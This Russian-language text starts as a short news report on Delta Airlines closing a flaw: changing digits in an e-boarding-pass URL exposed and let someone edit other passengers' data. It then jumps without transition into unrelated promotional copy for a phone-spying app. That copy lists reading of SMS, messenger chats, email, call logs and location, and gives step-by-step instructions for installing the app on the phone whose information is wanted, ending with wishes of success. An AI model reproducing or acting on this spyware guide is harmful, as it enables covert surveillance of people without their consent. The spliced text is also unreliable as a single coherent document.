Delta Airlines устранила проблему, позволявшую изменять электронные билеты

04Информационный портал Time сообщает, что авиационная компания Delta Airlines внесла коррективы в систему выдачи электронных посадочных билетов, присутствующую на их официальном сайте. Брешь в защите выявил представитель интернет-издания BuzzFeed, которому удалось изменить лишь несколько символов в исходном URL-адресе своей страницы с билетом, чтобы получить доступ к информации, затрагивающей других пассажиров.

Изменение цифр в URL талона говорит о беспечности людей, проектировавших базу данных. Не были предусмотрены необходимые меры безопасности.
Более того, открывалась возможность менять места и редактировать любые данные, связанные с владельцем билета. Например, можно было изменить имя путешественника, или вовсе вычеркнуть его из списка пассажиров. Попади эта информация не в те руки – могли возникнуть серьёзные проблемы, вплоть до судебных разбирательств.

Также уязвимость позволяла косвенно получать информацию о пассажирах, которые решили воспользоваться услугами других авиакомпаний, а не только Delta Airlines. В официальном расследовании авиакомпании, идущем в данный момент, не нашлось фактов, свидетельствующих об изменениях в учётных записях пассажиров. Поэтому обнаруженная брешь стала лишь громким информационным поводом, но не послужила причиной каких бы то ни было убытков.

Сообщается, что IT-специалисты Delta Airlines оперативно начали устранять уязвимость, к настоящему времени она закрыта. Данный инцидент в очередной раз показывает, что даже самая совершенная защита может давать неожиданные сбои. По факту обнаруженной бреши проверку могут начать и другие авиакомпании, обладающие схожими электронными системами продажи авиабилетов.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.